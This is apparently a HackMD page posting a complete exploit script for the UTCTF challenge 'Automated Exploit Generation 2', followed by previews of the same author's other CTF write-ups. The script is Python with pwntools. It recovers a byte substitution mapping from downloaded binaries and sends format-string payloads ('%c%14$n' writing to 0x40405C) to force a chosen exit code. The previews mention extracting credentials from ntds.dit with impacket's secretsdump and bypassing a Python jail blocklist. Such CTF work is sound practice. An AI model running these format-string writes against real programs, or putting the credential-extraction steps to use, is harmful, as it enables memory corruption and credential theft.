# exp of Automated Exploit Generation 2 A little crypto(substitution) + pwn. ```python import os from pwn import * context.arch='amd64' context.terminal=['tmux','split','-h'] #p=process('./pwn') #gdb.attach(p,'b *0x40131f') #%49$p def get_bins(): ct = 0 for x in range(30): p=remote("pwn.utctf.live",5002) p.read() p.sendline("") data = p.readuntil("\n\n") with open(f"./demos/{ct}.hex",'w') as f: f.write(data[:-1].decode()) p.close() os.system(f"xxd -r ./demos/{ct}.hex > ./bins/{ct}") ct +=1 def pay_gen(re=0): res = b'' for x in range(0x200): tmp = x %0x100 if (re and x>=0x100): tmp = (-tmp) %0x100 if tmp == 0x0a: if re: tmp =0x1 else: tmp = 2 if tmp == 0x0: if re: tmp =0x2 else: tmp = 0x1 res+= tmp.to_bytes(1,"big") return res def run_bin(input,path="./bins/0"): p = process(path) p.sendline(input) res = p.read()[:-1] p.close() return res def exp(input,path='./bins/0'): p = process(path) gdb.attach(p) p.sendline(input) p.interactive() def tester(path="./bins/0"): pos = [] res = run_bin(pay_gen(),path) for x in range(0x100): if x == 0 or x == 0xa: pos.append(-1) continue tmp = [] for y in range(0x200): if x == res[y]: tmp.append(y) pos.append(tmp) pos2 = [] res = run_bin(pay_gen(-1),path) for x in range(0x100): if x == 0 or x == 0xa: pos2.append(-1) continue tmp = [] for y in range(0x200): if x == res[y]: tmp.append(y) pos2.append(tmp) # 1 and 2 res = [-1]*0x200 for _ in range(1,3): for i in pos[_]: if i in pos2[_]: res[_] = i pos[_].remove(i) pos2[_].remove(i) break # 0xa for i in pos[2]: if i in pos2[1]: res[0xa] = i pos[2].remove(i) pos2[1].remove(i) break # 0x101 for i in pos[1]: if i not in pos2[2]: res[0x101] = i pos[1].remove(i) break # 0x1fe for i in pos2[2]: if i not in pos[1]: res[0x1fe] = i pos2[2].remove(i) break #print(pos) #print(pos2) #print("="*0x200) for x in range(0x100): if pos[x] == -1: pass elif len(pos[x]) == 4: pass elif len(pos[x]) == 2 and x>2: if pos[x][0] in pos2[x]: # this one is correct res[x] = pos[x][0] res[x+0x100] = pos[x][1] else: res[x] = pos[x][1] res[x+0x100] = pos[x][0] #print(res) rrr = [1]*0x200 rrr[0] = 0x11 rrr[0x100] = 0x22 rrr[0x102] = 0x33 rrr[0x10a] = 0x44 pay=b'' for x in rrr: pay+=x.to_bytes(1,'big') tmp = run_bin(pay,path) res[0]=tmp.index(b'\x11') res[0x100]=tmp.index(b'\x22') res[0x102]=tmp.index(b'\x33') res[0x10a]=tmp.index(b'\x44') #print(res) mapping = [] for x in range(0x200): mapping.append(res.index(x)) return mapping def convert(pay,mapping): res = [-1]*0x200 for x in range(0x200): res[mapping[x]] = pay[x] ppp = b'' for x in range(0x200): ppp+=res[x].to_bytes(1,'big') return ppp def do_test(): res = tester("./bins/29") payload = b"%c%14$n".ljust(0x30,b'\1')+p64(0x40405C) payload=payload.ljust(0x200,b'\1') payload = convert(payload,res) exp(payload,"./bins/29") def main(): p=remote("pwn.utctf.live",5002) p.read() p.sendline("") while(1): data = p.readuntil("\n\n") with open(f"./demos/cur.hex",'w') as f: f.write(data[:-1].decode()) os.system(f"xxd -r ./demos/cur.hex > ./bins/cur") p.readuntil("Binary should exit with code ") ret_val = int(p.readline()[:-1]) if ret_val: payload = f"%{ret_val}c%14$n".encode().ljust(0x30,b'\1')+p64(0x40405C) else: payload = b"%14$n".ljust(0x30,b'\1')+p64(0x40405C) payload=payload.ljust(0x200,b'\1') payload = convert(payload,tester("./bins/cur")) context.log_level='debug' p.sendlineafter(": \n",payload) p.readline() p.interactive() main() ```
Last changed by  
crazyman
r3kapig摸鱼划水人 平常喜欢做做misc以及取证类题目 现在在学习逆向和pwn 密码等方向 比较菜 呜呜呜呜
407

Read more

西湖论剑-Isolated Machine Memory Analysis Writeup

本文赛后与zysgmzb共同完成 Isolated Machine Memory Analysis: 题目名称: Isolated Machine Memory Analysis 题目内容: 张三,现用名叫Charlie,在一家外企工作,负责flag加密技术的研究。为了避免flag泄露,这家企业制定了严格的安全策略,严禁flag离开研发服务器,登录服务器必须经过跳板机。张三使用的跳板机是一台虚拟机,虽然被全盘加密没法提取,但好消息是至少还没关机。 免责声明:本题涉及的人名、单位名、产品名、域名及IP地址等均为虚构,如有雷同纯属巧合。 注:本题模拟真实研发环境,解题有关的信息不会出现在人名、域名或IP地址等不合常理的地方。链接:https://pan.baidu.com/s/1WESej-pyjWKZni7drZGTig?pwd=cq46 提取码:cq46 题目难度:

3/1/2023
Insomni'hack teaser 2023 - Autopsy:

In the Lunar New Year, I played Insomni'hack teaser 2023, one of the topics labeled forensics, realistic, windows aroused my interest, I solved him. And I learned some knowledge from it. This is the record writeup Autopsy: Wireshark loads through the export object and selects http, save all and then filters to get three files SYSTEM, SECURITY, ntds.dit Then after searching, you can learn some relevant content about credential extraction https://github.com/SecureAuthCorp/impacket Through some things made by secretdump.py, it seems that it is not very useful. But it may be used to extract the key to decrypt the traffic

1/23/2023
idek 2022* CTF Pyjail && Pyjail Revenge Writeup

Pyjail: The code looks like this blocklist = ['.', '\\', '[', ']', '{', '}',':'] DISABLE_FUNCTIONS = ["getattr", "eval", "exec", "breakpoint", "lambda", "help"] DISABLE_FUNCTIONS = {func: None for func in DISABLE_FUNCTIONS} There is a blocklist ban off '.' , '\\', '[', ']', '{', '}', ':'. Then there is a DISABLE_FUNCTIONS that registers None objects for 'getattr', 'eval', 'exec', 'breakpoint', 'lambda', 'help' and overrides the corresponding functions in __builtins__. Also, the file name is jail.py, and the one in docker is also jail, so you can use __import__('jail'), but you may have to type it twice, so it's better to use __import__(__main__). Also flag sets permission not to read directly and then gives a readflag, called with the argument /readflag giveflag Also, this question can be executed in multiple lines, so you can do something like emptying the blocklist as follows

1/18/2023
idek CTF 2022* Forensics - HiddenGem Mixtape Writeup

This week is the Preliminary Eve in China, and most of my time is resting and partying. At the same time, there are some good challenges in idek CTF, among which I prefer the HiddenGem Mixtape series of challenges. Since I am a forensics enthusiast, and I I am also a malware analyst. So I prefer this challenge that is close to the realworld. Although some people may feel that this challenge is strange,guessing. Including some designs that may confuse the players. I hope my writeup can let you learn more much.Let's gooooo And a digression: szymex73 so strong! █Bquanman█ so strong! HiddenGem Mixtape: After downloading the file, we got three files 2023-01-07T194857_HiddenGem.zip,Note.txt,HiddenGem.7z 2023-01-07T194857_HiddenGem.zip after decompression is 2023-01-07T194857_HiddenGem.vhdx Note.txt:

1/16/2023
Read more from crazyman
Published on HackMD